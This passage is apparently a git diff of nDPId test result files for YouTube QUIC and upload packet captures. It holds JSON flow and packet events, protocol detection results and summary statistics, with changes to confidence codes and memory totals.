LzWLKXSjlRTCuInYAnb8OLy7A3ZgiVpjlf24uxYYBETmSsYE22pkbiA3KDPQJQySgTeBTaSmM7bUYZKVC0sqnRUOvf3ZY91A7qJZn\/ba900D1Z+aCkzIM+N0cL4OdjAPHVbjoNNBPob96VT7KYOqrcxvdgiQK4z8YyO7qPdy3wkVPEp8S1cfxO0GcnNc57dkkmdplcftLswiLsyuSbEUEIvemACkZhnlX++EeQWxNqo5pgetjas2fIO3OoczlGrqEelJ1yoqALFrNOoHHqiCTaPzG9Vq6SC5ccc+y0eJXHfhIMNqRedbbXK4yLYwqtZ9myh7TSQTMNDNtNNcokuMoYRffKy+Hilx9blgPA+kxeACnNv8k+XoHbLejLn53fsVGrfJ27oHLpBxd0gpX8C1SWMyy3mXnpEVSzUrkvObuxIcI1iIIRkXe4ha0xa6JvFSR1XvxPQ5uBs1VZvBiRzdozCrjMOEc9HhPIaepumDcavW6RkKdtpFOTOABhKPB+xTF+tw5twgZvOB6spOi3XFDCLlgZYRUP2AglByKCpQdxHum5b0xn6Bxg+gulV7DAa4F6bq\/phQubcSVFzDkjjddAVTq8Ke7Bcb2PIaw4POMGF8i+3Ejx3gConV0\/n9f+1mrX6y1TPQ+529up7M7aIJBqu\/KbECK4GCmg+69dFQcqMdvDDodT0LicyE6jgNHVr3Xxl9T9WRp\/ZEkID0WaSc8lamVKWuAoEej6VLe9Xsojacxjt0L1ZkVNCdZBeOWPV\/2r27Cc0KxFG00xU+mkL6oc\/P+4mp1vjwqej4OpJO4H7X\/bD1uR+eKFP96VSf8gVXiQ3DmEGxcfGruXncj9yz32x4yvvKzg03pwZiXXTtpaX0N3ObUthGwiiBr3OqJCsJVke4\/DSc35dh+HTeY+td+Oc4jCcwuV2lOoS0dT73DkKXYTbuBravYDZhjPNKQNF+6bWKCm8kZsYuCZUcPzccjiAYkhk0zhBSnaWNqdI6hOWVUghH2pIeRl1S8CHH23kuVsWd8GixiV6+GG7ClvWoVE8MrCJVfuDBih03bB7tpS\/HVKC2E9e6YR1Im8\/dzl\/GrYBeLaQJMx6dvF2cWrBFw9TxwkKIBGesF7P4zSSZnZmPB\/8T0n45nH26wWJrG9slMatMUMQF1ah+pPdZ8x+tlROoO4fF2yjn4px+eRlie\/MHUCbhkcAUhlXdTBiPNIvr7yc+xKglTelzU+igEYMaYRT7qb8rNLbLWFex\/imDEBTq6nYSPvkTgwNxYJA65n\/p6p8VPjqErPaqpEUd07O9wbQiW9G2X\/qbV3yLCPMbA96flDvOZN+LC6\/DnJyMwZn5lo+SBoTbwt518b7bgUS1UA82oVmCGe8vFKQu9\/05aE1OZbqUSUoFxZX0RxFiFxGsclnNnAvgLNexJFieDNVkLIeVZwsdn1VKuKE5NTKqEm\/iO1n+rmnQA3"} 00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1489363824402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":356,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":356,"pkt_l4_len":322,"thread_ts_msec":1489363824402,"pkt":"gCqojWksxCwDBkn+CABFAAFWgV8AAEARAADAqAEH2DrNQtJjAbsBQmiADXhX73QJ\/9nIUTAzNQNN4EYmtc8pzVIIOlw5wUUTViVod6Y0+1HgA3vBxmFBB9XdzPolT4EuSqVTYDWG+BQf0+uutBG1cIb1StnXne22+Sa3VBkmnkxHzdhhHTq5RFHE1DzOC1OWyujit50aD9fovXbwARSedQlPJ7gjdJSVfTm6O3nF2k42pradZvrpU1ech4qBDDCfAnmOfCXqI5NXsD3jyb4bcNfoTf5ko+c96L+Kv0ngIjlmGgFFf6vJ8QwUVroovQmrUV9bPxW9NYlbZzDQO3\/aocbUP2HxCiVbIwPbD2Jd4G+p\/+kRB\/3zN\/cBW\/zgsZhwNASU8TEuM0gATTjCn+DvX6KA+8RurPRChvD1WnZ\/ZRI9q2M84tMzgiUjvDAoLSC7i0dr41HUDnzmJH+mr0XOTEoxFNo="} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1489363823738,"flow_last_seen":1489363826862,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":167659,"flow_avg_l4_payload_len":649,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.198.33","src_port":56074,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1489363823466,"flow_last_seen":1489363824024,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3933,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1489363824401,"flow_last_seen":1489363824840,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1489363826862,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":53859,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":289,"source":"youtube_quic.pcap","alias":"nDPId-test","packets-captured":289,"packets-processed":289,"total-skipped-flows":0,"total-l4-payload-len":179501,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1489363826862} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 289/289 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880088 bytes -~~ total memory freed........: 5880088 bytes -~~ total allocations/frees...: 118414/118414 +~~ total memory allocated....: 6013722 bytes +~~ total memory freed........: 6013722 bytes +~~ total allocations/frees...: 121176/121176 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 2273 chars diff --git a/test/results/youtubeupload.pcap.out b/test/results/youtubeupload.pcap.out index c005d4b75..2b86a68fd 100644 --- a/test/results/youtubeupload.pcap.out +++ b/test/results/youtubeupload.pcap.out @@ -2,24 +2,24 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1511102576794} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02246{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1511102576794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576794,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAT5AAIARbUHAqAIbrNkXb8rVAbsFThECDZHSvk7nMdgaUTAzOQFHnN3hyT1jd4lP+l6gAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAc5gRWgAAAABmJfKEu+Ky\/D790R+7T+2\/0X2\/pJXF+QSwhgBhJRTmB2QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} 02258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1511102576850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576850,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTpL9CJHSvk7nMdgaAY7UOy2eqBjwqYbdQEABH3gBAQD\/\/\/\/6BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAEbxGDSLTF1Q0EvnndIQSTAo6qDgodwKRUkl\/wgXSXZEn9QM2BlHJ5TGchczmqfpPPkVE8tMlsFMfVeayelDb2fy4YzLDv2N+n2kP+GPU+AvJ+LZZRk0N6KyGXGuCIybXc0DgBajeTEN+eTXljBGAiEAu2XBBVnB4JB\/pAM2aIMKtRsM68whkJeFp\/sUQ4KWuigCIQClJ1nIthgBruSaqgIGHfDqWyoEY6pcU10gsmGqIhMu0lNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADPfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdBILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1511102576851,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576851,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTrHlCJHSvk7nMdgaAjk3HVeItBZp3u\/MM6QBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 